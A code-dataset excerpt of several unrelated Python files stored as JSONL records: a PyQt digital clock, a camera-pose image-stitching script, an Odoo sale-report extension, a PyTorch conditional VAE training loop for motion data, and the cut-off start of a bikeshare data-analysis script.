레퍼런스\n#https://doc.qt.io/qt-5/qlcdnumber.html#setDigitCount\n\nclass MyWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.timer = QTimer(self)\n self.timer.setInterval(1000) #시간간격 1초\n self.timer.timeout.connect(self.timeout) #timeout 이벤트줄때 connect와 연결\n self.setWindowTitle('QTimer') #윈도우 타이틀\n self.setGeometry(100, 100, 600, 280) #윈도우 상단 100, 100, 그림의 크기 width, height\n\n layout = QVBoxLayout() #Layout은 BoxLayout\n\n self.lcd = QLCDNumber() #PyQt에서 전자시계를 표현하는 QLCD클래스\n self.lcd.display('') # 디스플레이에 보이는 내용을 비움\n self.lcd.setDigitCount(8) #디지털 시계의 자리수\n subLayout = QHBoxLayout() #VBoxLayout안에 넣을 가로방향 QHBoxLayout\n\n self.btnStart = QPushButton(\"시작\") #버튼 만듦\n self.btnStart.clicked.connect(self.onStartButtonClicked) #버튼이벤트 등록\n\n self.btnStop = QPushButton(\"멈춤\") #멈춤 버튼 만듦\n self.btnStop.clicked.connect(self.onStopButtonClicked) # 버튼 이벤트 등록\n\n layout.addWidget(self.lcd) #QLCDNumber 객체화면에 등록\n\n subLayout.addWidget(self.btnStart) #버튼 화면에 등록\n subLayout.addWidget(self.btnStop) #버튼 화면에 등록\n layout.addLayout(subLayout) #서브 Layout 등록\n\n self.btnStop.setEnabled(False) #클릭시 비활성\n self.setLayout(layout)\n\n def onStartButtonClicked(self):\n self.timer.start() #타이머 스레드 시작\n self.btnStop.setEnabled(True) #stop버튼 활성\n self.btnStart.setEnabled(False) #start버튼 활성\n\n def onStopButtonClicked(self):\n self.timer.stop() #타이머 멈춤\n self.btnStop.setEnabled(False) #stop버튼 비활성\n self.btnStart.setEnabled(True) #start버튼 활성\n\n def timeout(self):\n sender = self.sender() #이벤트 객체에 접근자\n currentTime = QTime.currentTime().toString(\"hh:mm:ss\") #현재시간 표시 e.g 11:50:32\n if id(sender) == id(self.timer): #접근자와 timer가 같으면 화면에 표시\n self.lcd.display(currentTime)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n myWindow = MyWindow()\n myWindow.show()\n sys.exit(app.exec_())","sub_path":"OpenCV/OpenCV/pyqt/pyqt_clock.py","file_name":"pyqt_clock.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"190401455","text":"import cv2\nimport numpy as np\nimport math\nimport camera as camera\nimport plot_helper as plot_helper\nimport matplotlib.pyplot as plt\nfrom pyexcel_ods import get_data\nfrom itertools import cycle\n\n#https://github.com/eborboihuc/rotate_3d\n#https://python-projective-camera-model.readthedocs.io/en/latest/api.html\n\ndef swap_rows(input_matrix, ix, iy, iz):\n swap_matrix = input_matrix.copy()\n swap_matrix[0, :] = input_matrix[ix, :]\n swap_matrix[1, :] = input_matrix[iy, :]\n swap_matrix[2, :] = input_matrix[iz, :]\n return swap_matrix\n\ndef get_2d_points(array):\n array_2d = []\n for point in array:\n array_2d.append(point[0:2])\n return np.array(array_2d, np.float32)\n\ndef set_roi( stitch_image, roi_image, all_height, all_width, image_height, height_offset):\n hA = int(all_height - height_offset - image_height)\n wA = int(0)\n hB = int(all_height - height_offset)\n wB = int(all_width)\n stitch_image[hA:hB, wA:wB] += roi_image\n\ndef line_intersection(x1_1, x1_2, y1_1, y1_2, x2_1, x2_2, y2_1, y2_2):\n A1 = y1_1 - y1_2\n B1 = x1_2 - x1_1\n C1 = x1_1 * y1_2 - x1_2 * y1_1\n A2 = y2_1 - y2_2\n B2 = x2_2 - x2_1\n C2 = x2_1 * y2_2 - x2_2 * y2_1\n\n x = None\n y = None\n if B1 * A2 - B2 * A1 and A1:\n y = (C2 * A1 - C1 * A2) / (B1 * A2 - B2 * A1)\n x = (-C1 - B1 * y) / A1\n elif B1 * A2 - B2 * A1 and A2:\n y = (C2 * A1 - C1 * A2) / (B1 * A2 - B2 * A1)\n x = (-C2 - B2 * y) / A2\n\n return np.array([x,y])\n\ndata = get_data(\"dataset/metadata-v1_manual.ods\")\n\n# Read Image\nitems = list(data.items())\n\ninput_rt = []\norg_img = []\ninput_avg_rt = np.zeros((4,4))\n\nindex = 1\nnp.set_printoptions(formatter={'float': lambda x: \"{0:0.3f}\".format(x)})\n\nwhile index < len(items[0][1]):\n if(items[0][1][index]):\n img_path = \"dataset/snapshots/\"+items[0][1][index][0]\n im = cv2.imread(img_path)\n org_img.append(im)\n size = im.shape\n\n w = size[1]\n h = size[0]\n\n s = items[0][1][index][1]\n s = s.replace('[', '')\n s = s.replace(']', '')\n s = s.replace('\\n', ' ')\n\n rt_matrix = np.fromstring(s, sep=' ').reshape(4,4)\n input_rt.append(rt_matrix)\n input_avg_rt += rt_matrix\n\n index+=1\n\ninput_avg_rt = np.array( ( 1 / len( input_rt ) ) * input_avg_rt )\nprint(\"Input avg rt:\\n {0}\".format(input_avg_rt))\n\nix = np.argmin(np.fabs(input_avg_rt[0:3,3]),axis=0)\niy = np.argmax(np.fabs(input_avg_rt[0:3,3]),axis=0)\niz = 3 - ( ix + iy )\n\navg_rt = swap_rows(input_avg_rt, ix, iy, iz)\nprint(\"Avg rt:\\n {0}\".format(avg_rt))\n\nindex = 0\nmax_z = input_rt[index][iz,3]\ninput_rt[index] = swap_rows(input_rt[index], ix, iy, iz)\nprint(\"rt({0}):\\n {1}\".format(index,input_rt[index]))\n\nindex = 1\nwhile index < len(input_rt):\n max_z = np.min((max_z, input_rt[index][iz,3]))\n input_rt[index] = swap_rows(input_rt[index], ix, iy, iz)\n print(\"rt({0}):\\n {1}\".format(index,input_rt[index]))\n index += 1\n\nprint(\"Max z:\\n {0}\".format(max_z))\n\navg_rt_sign = np.sign(avg_rt)\nbasis = np.zeros(avg_rt.shape)\n\nindex = 0\nwhile index < avg_rt.shape[1]:\n basis[index,index] = avg_rt_sign[index,index]\n index += 1\n\nprint(\"Basis:\\n {0}\".format(basis))\n\nfov_x = 38.2 * math.pi / 180\nfov_y = 29.1 * math.pi / 180\nc_x = w / 2\nc_y = h / 2\n\nf_x = w * math.tan(fov_x)\nf_y = h * math.tan(fov_y)\n\ncamera_views = []\noutput_camera_views = []\nmax_tz = 0\n\nindex = 0\nwhile index < len(input_rt):\n R = np.array(input_rt[index][0:3, 0:3])\n cam_pos = np.array(input_rt[index][0:3, [3]])\n t = -R.dot(cam_pos)\n\n if index == 0:\n max_tz = t[2]\n max_tz = np.max((max_tz,t[2]))\n\n print(\"\\nCamera: {0}\".format(index))\n print(\"Cam possition:\\n {0}\".format(cam_pos))\n print(\"R:\\n {0}\".format(R))\n print(\"t:\\n {0}\".format(t))\n\n input_cam = camera.Camera(index)\n input_cam.set_K_elements(u0_px=c_x, v0_px=c_y, fx=f_x,fy=f_x)\n input_cam.set_R(R)\n input_cam.set_t(t)\n camera_views.append(input_cam)\n\n index += 1\n\nscena = plot_helper.prepare_plot(\"Scena\")\n\ncycol = cycle('bgrcmk')\n\nimage_center = np.array([[w/2, h/2]]).T\nimage_points = [np.array([[0., 0]]).T, np.array([[0., h - 1]]).T, np.array([[w - 1, h - 1]]).T, np.array([[w - 1, 0]]).T]\n\nfor cam in camera_views:\n world_center = cam.image_to_world(image_center, z=0)\n\n world_points = []\n output_points = []\n for point in image_points:\n world_points.append(cam.image_to_world(point, z=0))\n\n input_cam_pos = -cam.R.T.dot(cam.t)\n\n x = world_center[0,0]\n y = world_center[1,0]\n z = world_center[2,0]\n\n output_cam_pos = np.array([[avg_rt[0,3]],[y],[-max_z]])\n output_t = -np.eye(3).dot(output_cam_pos)\n output_t = np.array(output_t)\n\n\n R = np.array([[-1, +0, +0],\n [+0, +1, +0],\n [+0, +0, -1]])\n\n output_cam = camera.Camera(cam.id)\n output_cam.set_K(cam.K)\n output_cam.set_R(R)\n output_cam.set_t(output_t)\n\n\n for point in world_points:\n output_points.append(output_cam.world_to_image(point))\n\n output_cam.M = cv2.getPerspectiveTransform(get_2d_points(image_points), get_2d_points(output_points))\n output_cam.world_center = output_cam_pos\n output_cam.world_points = world_points\n output_cam.output_points = output_points\n output_camera_views.append(output_cam)\n\n line_color = next(cycol)\n plot_helper.plot_camera(scena, input_cam_pos, cam.R, 5)\n plot_helper.plot_point(scena, world_center, line_color)\n plot_helper.plot_point(scena,input_cam_pos, line_color)\n plot_helper.plot_line(scena, world_center, input_cam_pos, line_color,':')\n\n plot_helper.plot_camera(scena, output_cam_pos, output_cam.R, 5)\n plot_helper.plot_line(scena, world_center, output_cam_pos, line_color, ':')\n plot_helper.plot_point(scena, output_cam_pos, line_color)\n\n plot_helper.plot_line(scena, world_points[0], world_points[1], line_color, '-')\n plot_helper.plot_line(scena, world_points[1], world_points[2], line_color, '-')\n plot_helper.plot_line(scena, world_points[2], world_points[3], line_color, '-')\n plot_helper.plot_line(scena, world_points[3], world_points[0], line_color, '-')\n\ni = 1\nwhile i < len(output_camera_views):\n j = i\n while j > 0 and output_camera_views[j-1].world_center[1,0] > output_camera_views[j].world_center[1,0]:\n cam = output_camera_views[j-1].copy()\n output_camera_views[j - 1] = output_camera_views[j].copy()\n output_camera_views[j] = cam\n j -= 1\n i += 1\n\nheight = 0\nmax_w = w\nmax_h = h\nindex = 0\nwhile index < len(output_camera_views):\n if index == 0:\n cam1 = output_camera_views[index]\n else:\n cam1 = output_camera_views[index-1]\n\n cam2 = output_camera_views[index]\n\n poly_points = np.array(((cam2.output_points[0][0:2]),\n (cam2.output_points[1][0:2]),\n (cam2.output_points[2][0:2]),\n (cam2.output_points[3][0:2])), dtype=int)\n\n px, py, pw, ph = cv2.boundingRect(poly_points)\n max_w = np.max((max_w, pw + px))\n max_h = np.max((max_h, ph + py))\n\n cam11_center = cam1.world_to_image(cam1.world_center)\n cam12_center = cam1.world_to_image(cam2.world_center)\n cam21_center = cam2.world_to_image(cam1.world_center)\n\n # height += cam11_center[1] - cam12_center[1]\n height += cam12_center[1]\n # height += cam21_center[1]\n index += 1\n\nheight = int(np.round(height + max_h))\n\nprint(\"Height {0}\".format(height))\n\nstitch_image_all = np.zeros((height,max_w,3), np.uint8)\nstitch_image_poly = np.zeros((height,max_w,3), np.uint8)\n\nheight_offset = 0\nindex = 0\nwhile index < len(output_camera_views):\n\n if index == 0:\n cam1 = output_camera_views[index]\n else:\n cam1 = output_camera_views[index-1]\n\n cam0 = output_camera_views[0]\n cam2 = output_camera_views[index]\n\n cam11_center = cam1.world_to_image(cam1.world_center)\n cam12_center = cam1.world_to_image(cam2.world_center)\n cam21_center = cam2.world_to_image(cam1.world_center)\n cam00_center = cam0.world_to_image(cam0.world_center)\n cam20_center = cam2.world_to_image(cam0.world_center)\n\n # height_offset += int(cam11_center[1] - cam12_center[1])\n height_offset += int(cam12_center[1])\n # height_offset += int(cam21_center[1])\n points_height_offset = height - height_offset - max_h\n\n print(\"Stitch {0}\\n{1} {2} {3} {4} {5}\".format(index, cam11_center[1], cam12_center[1], cam21_center[1], cam11_center[1] - cam12_center[1], cam11_center[1] - cam21_center[1]))\n\n poly_points = np.array(((cam2.output_points[0][0:2]),\n (cam2.output_points[1][0:2]),\n (cam2.output_points[2][0:2]),\n (cam2.output_points[3][0:2])), dtype=int)\n\n i = 0\n while i < len(poly_points):\n poly_points[i][1] += points_height_offset\n i += 1\n\n lineThickness = 5\n\n cv2.line(stitch_image_poly, (poly_points[0][0], poly_points[0][1]), (poly_points[1][0], poly_points[1][1]), (0, 255, 0), lineThickness)\n cv2.line(stitch_image_poly, (poly_points[1][0], poly_points[1][1]), (poly_points[2][0], poly_points[2][1]), (0, 255, 0), lineThickness)\n cv2.line(stitch_image_poly, (poly_points[2][0], poly_points[2][1]), (poly_points[3][0], poly_points[3][1]), (0, 255, 0), lineThickness)\n cv2.line(stitch_image_poly, (poly_points[3][0], poly_points[3][1]), (poly_points[0][0], poly_points[0][1]), (0, 255, 0), lineThickness)\n\n im = cv2.warpPerspective(org_img[cam2.id], cam2.M, (max_w, max_h), borderValue=0)\n cv2.imwrite(\"out/{0}.jpg\".format(cam2.id), im)\n\n cv2.fillConvexPoly(stitch_image_all, poly_points, (0, 0, 0))\n set_roi(stitch_image_all, im, height, max_w, max_h, height_offset)\n\n '''\n resize = 0.5\n stitch_image = np.zeros((height, w, 3), np.uint8)\n set_roi(stitch_image, im, height, w, h, height_offset)\n stitch_image = cv2.resize(stitch_image, None, fx=resize, fy=resize)\n cv2.imwrite(\"out/stitch{0}.jpg\".format(index), stitch_image)\n '''\n index += 1\n\nresize = 0.50\nstitch_image_all = cv2.resize(stitch_image_all, None, fx=resize, fy=resize)\nstitch_image_poly = cv2.resize(stitch_image_poly, None, fx=resize, fy=resize)\ncv2.imwrite(\"out/stitch_image_all.jpg\", stitch_image_all)\ncv2.imwrite(\"out/stitch_image_poly.jpg\", stitch_image_poly)\n\nplot_helper.set_axes_equal(scena)\nplt.show()","sub_path":"windmill.py","file_name":"windmill.py","file_ext":"py","file_size_in_byte":10337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"286936632","text":"###############################################################################\n# For copyright and license notices, see __manifest__.py file in root directory\n###############################################################################\nfrom odoo import fields, models\n\n\nclass SaleReport(models.Model):\n _inherit = 'sale.report'\n\n unit_id = fields.Many2one(\n comodel_name='product.business.unit',\n string='Business unit',\n )\n area_id = fields.Many2one(\n comodel_name='product.business.area',\n string='Area',\n )\n\n def _query(self, with_clause='', fields=None, groupby='', from_clause=''):\n if not fields:\n fields = {}\n fields['unit_id'] = ', t.unit_id as unit_id'\n fields['area_id'] = ', t.area_id as area_id'\n groupby += ', t.unit_id, t.area_id'\n return super(SaleReport, self)._query(\n with_clause, fields, groupby, from_clause)\n","sub_path":"sale_business_unit/reports/sale_report.py","file_name":"sale_report.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"528758345","text":"import os\nimport sys\nimport numpy as np\nimport scipy.io as io\n\n\n######################################\n# Logging\nimport logging\n#FORMAT = '[%(levelname)s: %(filename)s: %(lineno)4d]: %(message)s'\nFORMAT = '[%(levelname)s: %(lineno)4d]: %(message)s'\nlogging.basicConfig(level=logging.INFO, format=FORMAT, stream=sys.stdout)\nlogger = logging.getLogger(__name__) ##default logger\n\n\n# Tensorboard logging. \ntensorboard_bLog = False \ntry:\n\tsys.path.append('../utils')\n\tfrom logger import Logger\n\ttensorboard_bLog = True\nexcept ImportError:\n\tpass\n\nimport torch\nimport torchvision\nfrom torch import nn\nfrom torch.autograd import Variable\nimport os\n\nimport modelZoo\n\n# Utility Functions\nfrom utility import print_options,save_options\nfrom utility import setCheckPointFolder\nfrom utility import my_args_parser\n\n\n######################################3\n# Parameter Handling\nparser = my_args_parser()\nargs = parser.parse_args()\n\n######################################3\n# Manual Parameter Setting\n\nargs.model ='autoencoder_3conv_vect_vae_conditional'\n#args.solver = 'sgd'\n#args.finetune = 'social_autoencoder_3conv_vae'\n#args.check_root = '/posefs2b/Users/hanbyulj/pytorch_motionSynth/checkpoint'\n#args.batch = 2\n#args.weight_kld = 0.0001\n\n# Some initializations #\ntorch.cuda.set_device(args.gpu)\n\nrng = np.random.RandomState(23456)\ntorch.manual_seed(23456)\ntorch.cuda.manual_seed(23456)\n\n\n######################################\n# Dataset \n#datapath ='/ssd/codes/pytorch_motionSynth/motionsynth_data' \ndatapath ='../../motionsynth_data/data/processed/' \n\n#train_dblist = ['data_hagglingSellers_speech_formation_30frm_5gap_white_training']\n#train_dblist = ['data_hagglingSellers_speech_face_60frm_5gap_white_training']\n#test_dblist = ['data_hagglingSellers_speech_face_60frm_5gap_white_testing']\n\n# train_dblist = ['data_hagglingSellers_speech_face_60frm_5gap_white_testing_tiny']\n# test_dblist = ['data_hagglingSellers_speech_face_60frm_5gap_white_testing_tiny']\n\ntrain_dblist = ['data_hagglingSellers_speech_face_120frm_10gap_white_training']\ntest_dblist = ['data_hagglingSellers_speech_face_120frm_10gap_white_testing']\n\n# train_dblist = ['data_hagglingSellers_speech_face_120frm_10gap_white_training_tiny']\n# test_dblist = ['data_hagglingSellers_speech_face_120frm_10gap_white_training_tiny']\n\ntrain_data = np.load(datapath + train_dblist[0] + '.npz')\ntrain_X_raw= train_data['clips'] #Input (numClip, chunkLengh, dim:200) \ntrain_speech_raw = train_data['speech'] #Input (numClip, chunkLengh)\n\ntest_data = np.load(datapath + test_dblist[0] + '.npz')\ntest_X_raw= test_data['clips'] #Input (numClip, chunkLengh, dim:200) \ntest_speech_raw = test_data['speech'] #Input (numClip, chunkLengh)\n\n\n# Select speech only\n# speak_time =[]\n# #Choose only speaking signal\n# for i in range(train_X_raw.shape[0]):\n# speechSignal = train_speech_raw[i,:]\n# if np.min(speechSignal)==1:\n# speak_time.append(i)\n# train_X_raw = train_X_raw[speak_time,:,:]\n\n# generate binary speech label for each sequence\ntrain_speech_binary =np.max(train_speech_raw,axis=1).astype(np.float32) \nlogger.info('train speech data: speak: {}/{} = {} '.format(sum(train_speech_binary),len(train_speech_binary), sum(train_speech_binary)/len(train_speech_binary)))\ntrain_speech_binary = np.expand_dims(train_speech_binary,1) #(batch, 1)\ntrain_speech_binary = np.expand_dims(train_speech_binary,2) #(batch, 1, 1)\n\n\n\ntrain_speech_binary = np.repeat(train_speech_binary,train_X_raw.shape[1], axis=2) ##(batch, 1, frameNum:120)\n\n\n\ntest_speech_binary =np.max(test_speech_raw,axis=1).astype(np.float32) \ntest_speech_binary = np.expand_dims(test_speech_binary,1) #(batch, 1, 1)\ntest_speech_binary = np.expand_dims(test_speech_binary,2) #(batch, 1, 1)\ntest_speech_binary = np.repeat(test_speech_binary,test_X_raw.shape[1], axis=2) ##(batch, 1, frameNum:120)\n\n\"\"\"Visualize X and Y\n#by jhugestar\nfor frameIdx in range(1,train_X_raw.shape[1],10):\n sys.path.append('/ssd/codes/glvis_python/')\n #from glViewer import showSkeleton,show_Holden_Data_73 #opengl visualization \n import glViewer\n glViewer.show_Holden_Data_73([ np.swapaxes(train_X_raw[1,frameIdx,:,:],0,1), np.swapaxes(train_X_raw[2,frameIdx,:,:],0,1) ] )\n\"\"\"\n\n######################################\n# Feature\nfeatureDim = 5\ntrain_X_raw = train_X_raw[:,:,:featureDim]\ntest_X_raw = test_X_raw[:,:,:featureDim]\n\n\n######################################\n# Network Setting\nnum_epochs = args.epochs #500\n#batch_size = 128\nbatch_size = args.batch\nlearning_rate = 1e-3\n\n\nmodel = getattr(modelZoo,args.model)(featureDim, args.latentDim_vae).cuda()\n# if args.autoreg ==1: #and \"vae\" in args.model:\n# model = getattr(modelZoo,args.model)(frameLeng=160).cuda()\n# else:\n# model = getattr(modelZoo,args.model)().cuda()\n#model = modelZoo.autoencoder_1conv_vect(featureDim).cuda()\n#model = modelZoo.autoencoder_1conv_vect_vae(featureDim).cuda()\n#model = modelZoo.autoencoder_3conv_vect_vae(featureDim).cuda()\n\nmodel.train()\n\n# for param in model.parameters():\n# print(type(param.data), param.size())\n\n# Loss Function #\n#criterion = nn.BCELoss()\ncriterion = nn.MSELoss()\n\n# Solver #\nif args.solver == 'adam':\n logger.info('solver: Adam')\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=1e-5)\nelif args.solver == 'sgd':\n optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)\n logger.info('solver: SGD')\nelif args.solver == 'adam_ams': #only for pytorch 0.4 or later.\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=1e-5, amsgrad=True)\n logger.info('solver: Adam with AMSGrad')\nelse:\n logger.info('Unknown solver option')\n assert(False)\n\n\n######################################\n# Set Check point folder\ncheckpointFolder = setCheckPointFolder(args, model)\ncheckpointFolder_base = os.path.basename(checkpointFolder) \n\n\n######################################\n# Load pre-trained parameters\npretrain_epoch = 0\npretrain_batch_size =args.batch #Assume current batch was used in pretraining\nif args.finetune != '':\n from utility import loadPreTrained\n model, optimizer, pretrain_epoch, pretrain_batch_size = loadPreTrained(args, checkpointFolder, model, optimizer)\n\n\n######################################\n# Log file path + Tensorboard Logging\nfileHandler = logging.FileHandler(checkpointFolder+'/train_log.txt') #to File\nlogger.addHandler(fileHandler)\nif tensorboard_bLog:\n tb_logger = Logger(checkpointFolder+'/logs') #tensorboard logger\n\n# Save Option Info \noption_str, options_dict = print_options(parser,args)\nsave_options(checkpointFolder, option_str, options_dict)\n\n\n# ######################################\n# # Input/Output Option\n# train_X = train_X_raw[1,:,:,:] #1st seller, (num, frameNum, featureDim:73)\n# train_X = np.concatenate( (train_X, train_X_raw[2,:,:,:]), axis= 0) \n\n# train_Y = train_X_raw[2,:,:,:] #1st seller, (num, frameNum, featureDim:73)\n# train_Y = np.concatenate( (train_Y, train_X_raw[1,:,:,:]), axis= 0) \n\n# test_X = test_X_raw[1,:,:,:] #1st seller, (num, frameNum, featureDim:73)\n# test_Y = test_X_raw[2,:,:,:] #1st seller, (num, frameNum, featureDim:73)\ntrain_X = train_X_raw\ntest_X = test_X_raw\n\n\n# ######################################\n# Compute mean and std \ntrain_X = np.swapaxes(train_X, 1, 2).astype(np.float32) #(num, featureDim, frameNum)\n#train_Y = np.swapaxes(train_Y, 1, 2).astype(np.float32) #(num, featureDim, frameNum)\n\ntest_X = np.swapaxes(test_X, 1, 2).astype(np.float32) #(num, featureDim, frameNum)\n#test_Y = np.swapaxes(test_Y, 1, 2).astype(np.float32) #(num, featureDim, frameNum)\n\nXmean = train_X.mean(axis=2).mean(axis=0)[np.newaxis,:,np.newaxis] #(1, featureDim, 1)\nXstd = np.array([[[train_X.std()]]]).repeat(train_X.shape[1], axis=1) #(1, featureDim, 1)\n# Data standardization \ntrain_X = (train_X - Xmean) / Xstd\n#train_Y = (train_Y - Xmean) / Xstd\n\ntest_X = (test_X - Xmean) / Xstd\n#test_Y = (test_Y - Xmean) / Xstd\n\n# Save mean and var\nnp.savez_compressed(checkpointFolder+'/preprocess_core.npz', Xmean=Xmean, Xstd=Xstd)\n\n# Data Shuffle\nI = np.arange(len(train_X))\nrng.shuffle(I)\ntrain_X = train_X[I]\ntrain_speech_binary = train_speech_binary[I]\n#train_Y = train_Y[I]\n\nlogger.info('Input data size: {0}'.format(train_X.shape))\n\n######################################\n# Some settings before training\nif train_X.shape[0] < batch_size:\n batch_size = train_X.shape[0]\ncurBestloss = 1e3\n#Compute stepNum start point (to be continuos in tensorboard if pretraine data is loaded)\nfilelog_str = ''\nstepNum = pretrain_epoch* len(np.arange(train_X.shape[0] // pretrain_batch_size))\n\n\n######################################\n# Training\nfor epoch in range(num_epochs):\n\n model.train()\n\n batchinds = np.arange(train_X.shape[0] // batch_size)\n rng.shuffle(batchinds)\n \n # Each Batch\n avgLoss =0\n avgReconLoss = 0\n avgKLDLoss = 0\n cnt = 0\n for bii, bi in enumerate(batchinds):\n\n idxStart = bi*batch_size\n inputData_np = train_X[idxStart:(idxStart+batch_size),:,:] #(batch, featureDim, frameNum)\n\n inputdata_speech = train_speech_binary[idxStart:(idxStart+batch_size)]*100 ##(batch, 1, 120)\n\n inputData_np = np.concatenate( (inputData_np,inputdata_speech), axis=1) #(batch, featureDim+1, frameNum)\n inputData = Variable(torch.from_numpy(inputData_np)).cuda() #(batch, 73, frameNum)\n\n inputData_speech_cuda = Variable(torch.from_numpy(inputdata_speech[:,:,0])).cuda() \n #outputGT = Variable(torch.from_numpy(outputData_np)).cuda() #(batch, 73, frameNum)\n #outputGT = Variable(torch.from_numpy(inputData_np)).cuda() #(batch, 73, frameNum) \n\n\n #################### VAE Only #################### \n # ===================forward=====================\n output, mu, logvar = model(inputData, inputData_speech_cuda)\n #loss = criterion(output, inputData)\n #loss = modelZoo.vae_loss_function(output, inputData, mu, logvar,criterion)\n #loss, recon_loss, kld_loss = modelZoo.vae_loss_function(output, inputData, mu, logvar,criterion,args.weight_kld)\n loss, recon_loss, kld_loss = modelZoo.vae_loss_function(output, inputData[:,:-1,:], mu, logvar,criterion,args.weight_kld) #ignore label in the inputData\n \n\n # ===================backward====================\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # ===================log========================\n # print('model: {}, epoch [{}/{}], loss:{:.4f} (recon: {:.4f}, kld {:.4f})'\n # .format(checkpointFolder_base, epoch +pretrain_epoch, num_epochs, loss.item(), recon_loss.item(), kld_loss.item()))\n avgLoss += loss.item()*batch_size\n avgReconLoss += recon_loss.item()*batch_size\n avgKLDLoss += kld_loss.item()*batch_size\n\n if tensorboard_bLog:\n # 1. Log scalar values (scalar summary)\n if int(torch.__version__[2])==2:\n info = { 'loss': loss.data[0] }\n else:\n info = { 'loss': loss.item(), 'reconLoss': recon_loss.item(), 'kldLoss': kld_loss.item() }\n\n for tag, value in info.items():\n tb_logger.scalar_summary(tag, value, stepNum)\n \n stepNum = stepNum+1\n\n ######################################\n # Logging\n temp_str = 'model: {}, epoch [{}/{}], avg loss:{:.4f} (recon: {:.4f}, kld: {:.4f})'.format(checkpointFolder_base, epoch +pretrain_epoch, num_epochs,\n avgLoss/ (len(batchinds)*batch_size),\n avgReconLoss/ (len(batchinds)*batch_size),\n avgKLDLoss/ (len(batchinds)*batch_size)\n )\n logger.info(temp_str)\n \n\n\n\n ######################################\n # Check Testing Error\n batch_size_test = batch_size\n test_loss = 0\n test_avgReconLoss = 0\n test_avgKLDLoss = 0\n cnt =0.0\n\n model.eval()\n batchinds = np.arange(test_X.shape[0] // batch_size_test)\n for bii, bi in enumerate(batchinds):\n\n idxStart = bi*batch_size\n inputData_np = test_X[idxStart:(idxStart+batch_size),:,:]\n #outputData_np = test_Y[idxStart:(idxStart+batch_size),:,:]\n\n inputdata_speech = test_speech_binary[idxStart:(idxStart+batch_size)]*100 ##(batch, 1, 120)\n inputData_np = np.concatenate( (inputData_np,inputdata_speech), axis=1) #(batch, featureDim+1, frameNum)\n\n inputData = Variable(torch.from_numpy(inputData_np)).cuda() #(batch, 73, frameNum)\n inputData_speech_cuda = Variable(torch.from_numpy(inputdata_speech[:,:,0])).cuda() \n \n #outputGT = Variable(torch.from_numpy(outputData_np)).cuda() #(batch, 73, frameNum)\n #outputGT = Variable(torch.from_numpy(inputData_np)).cuda() #(batch, 73, frameNum)\n\n\n\n # ===================forward=====================\n output, mu, logvar = model(inputData, inputData_speech_cuda)\n\n if isinstance(output, tuple):\n output = output[0]\n #loss = criterion(output, outputGT)\n\n if \"vae\" in model.__class__.__name__:\n loss, recon_loss, kld_loss = modelZoo.vae_loss_function(output, inputData[:,:-1,:], mu, logvar, criterion, args.weight_kld)\n \n test_loss += loss.item()*batch_size_test\n test_avgReconLoss += recon_loss.item()*batch_size_test\n test_avgKLDLoss += kld_loss.item()*batch_size_test\n\n else:\n loss = criterion(output, inputData) #Just recon loss only\n\n test_loss += loss.item()*batch_size_test\n #test_loss += loss.data.cpu().numpy().item()* batch_size_test # sum up batch loss\n\n\n test_loss /= len(batchinds)*batch_size_test\n test_avgReconLoss /= len(batchinds)*batch_size_test\n test_avgKLDLoss /= len(batchinds)*batch_size_test\n \n logger.info(' On testing data: average loss: {:.4f} (recon: {:.4f}, kld: {:.4f})|| (best {:.4f})\\n'.format(test_loss, test_avgReconLoss, test_avgKLDLoss, curBestloss))\n if tensorboard_bLog:\n #info = { 'test_loss': test_loss }\n info = { 'test_loss': test_loss, 'test_reconLoss': test_avgReconLoss, 'test_KLDLoss': test_avgKLDLoss }\n for tag, value in info.items():\n tb_logger.scalar_summary(tag, value, stepNum)\n \n bNewBest = False\n if curBestloss > test_loss:\n curBestloss = test_loss\n bNewBest = True\n\n ######################################\n # Save parameters, if current results are the best\n if bNewBest or (epoch + pretrain_epoch) % args.checkpoint_freq == 0:\n #if (epoch + pretrain_epoch) % 1 == 0:\n fileName = checkpointFolder+ '/checkpoint_e' + str(epoch + pretrain_epoch) + '_loss{:.4f}'.format(test_loss) + '.pth'\n torch.save(model.state_dict(), fileName)\n fileName = checkpointFolder+ '/opt_state.pth' #overwrite\n torch.save(optimizer.state_dict(), fileName)\n #torch.save(model, fileName)\n","sub_path":"motionsynth_code/autoencoder_face/train_social_condition.py","file_name":"train_social_condition.py","file_ext":"py","file_size_in_byte":15082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"11193616","text":" #Libraries used in project#\nimport time\nimport pandas as pd\nimport numpy as np\nfrom datetime import date\n\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\ndf=CITY_DATA\n\ndef get_filters(welcome=True):\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n #Welcome message isn't displayed if user input is incorrect and the user is asked to reenter information\"\n if welcome:\n print('Hello! Let\\'s explore some US bikeshare data!')\n\n city=input(\"Which city would you like to explore?\").lower().strip()\n\n month=input(\"Which month are you going to explore; January, February, March, April, May or June?\").lower().strip()\n\n day=input(\"Which day of the week are you going to explore?\").lower().strip()\n return [city, month, day]\n\n\ndef load_data(city, month, day):\n \"\"\"\n Creates a dataframe with filtered data based on user input.\n If user input is incorrect or other than expected an empty object None is returned instead of a dataframe.\n \"\"\"\n\n # load data from the correct csv file based on user choice #\n if city in CITY_DATA:\n folder='/Users/theresesvensson/Documents/Other projects/Udacity/bikeshare-2/'\n path=folder+CITY_DATA[city]\n df=pd.read_csv(path)\n else:\n print('No data available for {}. Please choose between chicago, washington, new york city. Please make sure your spelling is correct.'.format(city))\n return None\n # convert the Start Time column to datetime\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n # controll that user input is correct 